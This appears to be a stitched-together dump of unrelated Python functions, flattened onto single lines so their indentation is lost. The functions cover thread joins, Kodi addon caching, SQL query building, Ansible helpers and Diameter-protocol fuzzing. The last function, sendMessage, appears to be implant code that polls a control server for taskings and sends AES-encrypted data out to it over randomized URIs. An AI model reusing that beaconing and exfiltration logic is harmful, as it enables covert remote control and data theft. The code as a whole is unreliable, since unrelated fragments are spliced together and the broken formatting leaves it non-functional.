def get_pid_location(module): """ Try to find a pid directory in the common locations, falling back to the user's home directory if no others exist """ for dir in ['/var/run', '/var/lib/run', '/run', os.path.expanduser("~/")]: try: if os.path.isdir(dir) and os.access(dir, os.R_OK|os.W_OK): return os.path.join(dir, '.accelerate.pid') except: pass module.fail_json(msg="couldn't find any valid directory to use for the accelerate pid file") # NOTE: this shares a fair amount of code in common with async_wrapper, if async_wrapper were a new module we could move # this into utils.module_common and probably should anyway
def _get_info(self, repoName, fullname): """Search for the respective package or module in the zipfile object""" parts = fullname.split('.') submodule = parts[-1] modulepath = '/'.join(parts) #check to see if that specific module exists for suffix, is_package in _search_order: relpath = modulepath + suffix try: moduleRepo[repoName].getinfo(relpath) except KeyError: pass else: return submodule, is_package, relpath #Error out if we can find the module/package msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName)) raise ZipImportError(msg)
def testMTRandomness(self): q = queue.Queue() def proc(): rng = tar.gen_rng() with tar.with_rng(rng): time.sleep(0.5) state = tar.get_rng().get_state() time.sleep(0.5) q.put(state) threads = [Thread(target=proc) for i in range(2)] map_exec(Thread.start, threads) map_exec(Thread.join, threads) v1, v2 = q.get(), q.get() self.assertFalse(np.allclose(v1[1], v2[1]))
def join(self): Thread.join(self) return self.select_objects
def is_join(self, historic, table_src, table_trg): historic = historic links = self.get_all_direct_linked_tables_of_a_table(table_src) differences = [] for join in links: if join[0][0] not in historic: differences.append(join) links = differences for join in links: if join[1][0] == table_trg: return [0, join] path = [] historic.append(table_src) for join in links: result = [1, self.is_join(historic, join[1][0], table_trg)] if result[1] != []: if result[0] == 0: path.append(result[1]) path.append(join) else: path = result[1] path.append(join) return path
def join(self): Thread.join(self) return self.queries
def join(self): Thread.join(self) return self.where_objects
def join(self): Thread.join(self) return self.order_by_objects
def remove_accents(self, string): nkfd_form = unicodedata.normalize('NFKD', str(string)) return "".join([c for c in nkfd_form if not unicodedata.combining(c)])
def join(self, timeout=None): try: self.queue.task_done() except ValueError as e: pass # Nothing waiting in queue, how nice! self.queue.put(None) Thread.join(self, timeout)
def qout_join(self): self.queue_out.join()
def join(self): MyPriorityQueue.join(self)
def tjoin(self): Thread.join(self)
def qout_join(self): for q in self.queue_out: q.join()
def join(self, timeout=0): """??????""" self._event.set() Thread.join(self, timeout)
def stop(timeout=None): """???????????????""" for thread in FThread._fthreads: thread.join(timeout)
def join(self,timeout=None): Thread.join(self, timeout=timeout) return self._return
def join(self, timeout): """ Join method :param timeout: thread timeout :return: thread method return value """ Thread.join(self, timeout) return self.return_value
def join(self, timeout=None): """Stops the thread""" self._stopevent.set() Thread.join(self, timeout)
def join(self, timeout=None): """Stops the thread""" self._stopevent.set() Thread.join(self, timeout) #--------------------------------------------------------------------#
def join(self): Thread.join(self) return self.exc_info
def get_JSON_response(url="", cache_days=7.0, headers=False): now = time.time() hashed_url = hashlib.md5(url).hexdigest() cache_path = xbmc.translatePath(os.path.join(ADDON_DATA_PATH, 'cache')) path = os.path.join(cache_path, hashed_url + ".txt") cache_seconds = int(cache_days * 86400.0) prop_time = HOME.getProperty(hashed_url + "_timestamp") if prop_time and now - float(prop_time) < cache_seconds: try: prop = json.loads(HOME.getProperty(hashed_url)) logger.info("streamondemand.channels.database prop load for %s. time: %f" % (url, time.time() - now)) return prop except: logger.info("could not load prop data for %s" % url) if xbmcvfs.exists(path) and ((now - os.path.getmtime(path)) < cache_seconds): results = read_from_file(path) logger.info("streamondemand.channels.database loaded file for %s. time: %f" % (url, time.time() - now)) else: response = get_http(url, headers) try: results = json.loads(response) logger.info("streamondemand.channels.database download %s. time: %f" % (url, time.time() - now)) save_to_file(results, hashed_url, cache_path) except: logger.info("streamondemand.channels.database Exception: Could not get new JSON data from %s. Tryin to fallback to cache" % url) if xbmcvfs.exists(path): results = read_from_file(path) else: results = [] HOME.setProperty(hashed_url + "_timestamp", str(now)) HOME.setProperty(hashed_url, json.dumps(results)) return results
def save_to_file(content, filename, path=""): if path == "": return False if not xbmcvfs.exists(path): xbmcvfs.mkdirs(path) text_file_path = os.path.join(path, filename + ".txt") now = time.time() text_file = xbmcvfs.File(text_file_path, "w") json.dump(content, text_file) text_file.close() logger.info("saved textfile %s. Time: %f" % (text_file_path, time.time() - now)) return True
def logInfo(*args): logging.getLogger(LOG_LOGGER).info(" - ".join(args)) ###################################################################################
def logWarning(*args): logging.getLogger(LOG_LOGGER).warning(" - ".join(args)) ###################################################################################
def logDebug(*args): if CONFIG["debug"]: logging.getLogger(LOG_LOGGER).debug(" - ".join(args)) ###################################################################################
def join(self, timeout=None): Thread.join(self, timeout)
def shutdown(self): self.stopEvent.set() self.join()
def get_data(self, fullpath): prefix = os.path.join(self.repoName, '') if not fullpath.startswith(prefix): raise IOError('Path %r does not start with module name %r', (fullpath, prefix)) relpath = fullpath[len(prefix):] try: return moduleRepo[self.repoName].read(relpath) except KeyError: raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def indent(lines, amount=4, ch=' '): padding = amount * ch return padding + ('\n'+padding).join(lines.split('\n')) # from http://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
def join(self): Thread.join(self) return self._return
def testFakeMTRandomness(self): mutex = threading.Lock() @contextlib.contextmanager def fake_with_rng(rrr): from tartist.random import rng with mutex: backup = rng._rng rng._rng = rrr yield rrr with mutex: rng._rng = backup q = queue.Queue() def proc(): rng = tar.gen_rng() with fake_with_rng(rng): time.sleep(0.5) state = tar.get_rng().get_state() time.sleep(0.5) q.put(state) threads = [Thread(target=proc) for i in range(2)] map_exec(Thread.start, threads) map_exec(Thread.join, threads) v1, v2 = q.get(), q.get() self.assertFalse(not np.allclose(v1[1], v2[1]))
def dwr_handler(fuzzed, f): (own_plug, fuzzed_plug) = sk.socketpair(sk.AF_UNIX, sk.SOCK_SEQPACKET) child = WrappedThread(fuzzed_plug, target=fuzzed, args=[fuzzed_plug]) child.start() while True: (readable, _, _) = sl.select([own_plug, f], [], []) if own_plug in readable: try: b = own_plug.recv(dm.U24_MAX) if len(b) == 0: break except: break f.send(b) elif f in readable: b = f.recv(dm.U24_MAX) if len(b) == 0: break m = dm.Msg.decode(b) if m.code == 280 and m.R: dwa = dm.Msg(code=280, R=False, e2e_id=m.e2e_id, h2h_id=m.h2h_id, avps=[ dm.Avp(code=264, M=True, data=local_host), dm.Avp(code=296, M=True, data=local_realm), dm.Avp(code=268, M=True, u32=2001), dm.Avp(code=278, M=True, u32=0xcafebabe)]) f.send(dwa.encode()) else: own_plug.send(b) own_plug.close() return child.join()
def get_path(a, codes): attrs = {} attrs['code'] = a.code if a.vendor != 0: attrs['vendor'] = a.vendor path = ','.join(['%s=%d' % (x, attrs[x]) for x in attrs]) key = (a.code, a.vendor) if len(codes[key]) != 1: path += '[%d]' % (codes[key].index(a)) return path
def dwr_handler(scenario, f): msgs = [] (own_plug, fuzzed_plug) = sk.socketpair(sk.AF_UNIX, sk.SOCK_SEQPACKET) child = Thread(target=scenario, args=[fuzzed_plug]) child.start() while True: (readable, _, _) = sl.select([own_plug, f], [], []) if own_plug in readable: b = own_plug.recv(dm.U24_MAX) if len(b) == 0: break m = dm.Msg.decode(b) msgs.append((m, True)) f.send(b) elif f in readable: b = f.recv(dm.U24_MAX) if len(b) == 0: break m = dm.Msg.decode(b) if m.code == 280 and m.R: dwa = dm.Msg(code=280, R=False, e2e_id=m.e2e_id, h2h_id=m.h2h_id, avps=[ dm.Avp(code=264, M=True, data=local_host), dm.Avp(code=296, M=True, data=local_realm), dm.Avp(code=268, M=True, u32=2001), dm.Avp(code=278, M=True, u32=0xcafebabe)]) f.send(dwa.encode()) else: msgs.append((m, False)) own_plug.send(b) own_plug.close() exc_info = child.join() return (exc_info, msgs)
def run(self): for table_of_from in self.tables_of_from: # for each query self.select_object = Select() is_count = False self.columns_of_select = self.uniquify(self.columns_of_select) number_of_select_column = len(self.columns_of_select) if number_of_select_column == 0: select_type = [] for count_keyword in self.count_keywords: # if count_keyword in (word.lower() for word in self.phrase): # so that it matches multiple words too in keyword synonymn in .lang rather than just single word for COUNT # (e.g. QUERY-> "how many city there are in which the employe name is aman ?" ) lower_self_phrase = ' '.join(word.lower() for word in self.phrase) if count_keyword in lower_self_phrase: select_type.append('COUNT') self.select_object.add_column(None, self.uniquify(select_type)) else: select_phrases = [] previous_index = 0 for i in range(0, len(self.phrase)): for column_name in self.columns_of_select: if (self.phrase[i] == column_name) or ( self.phrase[i] in self.database_object.get_column_with_this_name(column_name).equivalences): select_phrases.append(self.phrase[previous_index:i + 1]) previous_index = i + 1 select_phrases.append(self.phrase[previous_index:]) for i in range(0, len(select_phrases)): # for each select phrase (i.e. column processing) select_type = [] phrase = [word.lower() for word in select_phrases[i]] for keyword in self.average_keywords: if keyword in phrase: select_type.append('AVG') for keyword in self.count_keywords: if keyword in phrase: select_type.append('COUNT') for keyword in self.max_keywords: if keyword in phrase: select_type.append('MAX') for keyword in self.min_keywords: if keyword in phrase: select_type.append('MIN') for keyword in self.sum_keywords: if keyword in phrase: select_type.append('SUM') for keyword in self.distinct_keywords: if keyword in phrase: select_type.append('DISTINCT') if (i != len(select_phrases) - 1): column = self.get_column_name_with_alias_table(self.columns_of_select[i], table_of_from) self.select_object.add_column(column, self.uniquify(select_type)) self.select_objects.append(self.select_object)
def build_movie_list(item, movies): if movies is None: return [] itemlist = [] for movie in movies: title = normalize_unicode(tmdb_tag(movie, 'title')) title_search = normalize_unicode(tmdb_tag(movie, 'title'), encoding='ascii') poster = tmdb_image(movie, 'poster_path') fanart = tmdb_image(movie, 'backdrop_path', 'w1280') jobrole = normalize_unicode(' [COLOR azure][' + tmdb_tag(movie, 'job') + '][/COLOR]' if tmdb_tag_exists(movie, 'job') else '') genres = ' / '.join([tmdb_genre(genre).upper() for genre in tmdb_tag(movie, 'genre_ids', [])]) year = tmdb_tag(movie, 'release_date')[0:4] if tmdb_tag_exists(movie, 'release_date') else '' plot = "[COLOR orange]%s%s[/COLOR]\n%s"%(genres, '\n' + year, tmdb_tag(movie, 'overview')) plot = normalize_unicode(plot) found = False kodi_db_movies = kodi_database_movies(title) for kodi_db_movie in kodi_db_movies: logger.info('streamondemand.database set for local playing(%s):\n%s' % (title, str(kodi_db_movie))) if year == str(kodi_db_movie["year"]): found = True itemlist.append(Item( channel=item.channel, action='play', url=kodi_db_movie["file"], title='[COLOR orange][%s][/COLOR] ' % NLS_Library + kodi_db_movie["title"] + jobrole, thumbnail=kodi_db_movie["art"]["poster"], category=genres, plot=plot, viewmode='movie_with_plot', fanart=kodi_db_movie["art"]["fanart"], folder=False, )) if not found: logger.info('streamondemand.database set for channels search(%s)' % title) itemlist.append(Item( channel=item.channel, action='do_channels_search', extra=("%4s" % year) + title_search, title=title + jobrole, thumbnail=poster, category=genres, plot=plot, viewmode='movie_with_plot', fanart=fanart, )) return itemlist
def sendMessage(packets=None): """ Requests a tasking or posts data to a randomized tasking URI. If packets == None, the agent GETs a tasking from the control server. If packets != None, the agent encrypts the passed packets and POSTs the data to the control server. """ global missedCheckins global server global headers global taskURIs data = None if packets: data = "".join(packets) data = aes_encrypt_then_hmac(key, data) taskURI = random.sample(taskURIs, 1)[0] if (server.endswith(".php")): # if we have a redirector host already requestUri = server else: requestUri = server + taskURI try: data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read() return ("200", data) except urllib2.HTTPError as HTTPError: # if the server is reached, but returns an erro (like 404) missedCheckins = missedCheckins + 1 return (HTTPError.code, "") except urllib2.URLError as URLerror: # if the server cannot be reached missedCheckins = missedCheckins + 1 return (URLerror.reason, "") return ("","") ################################################ # # encryption methods # ################################################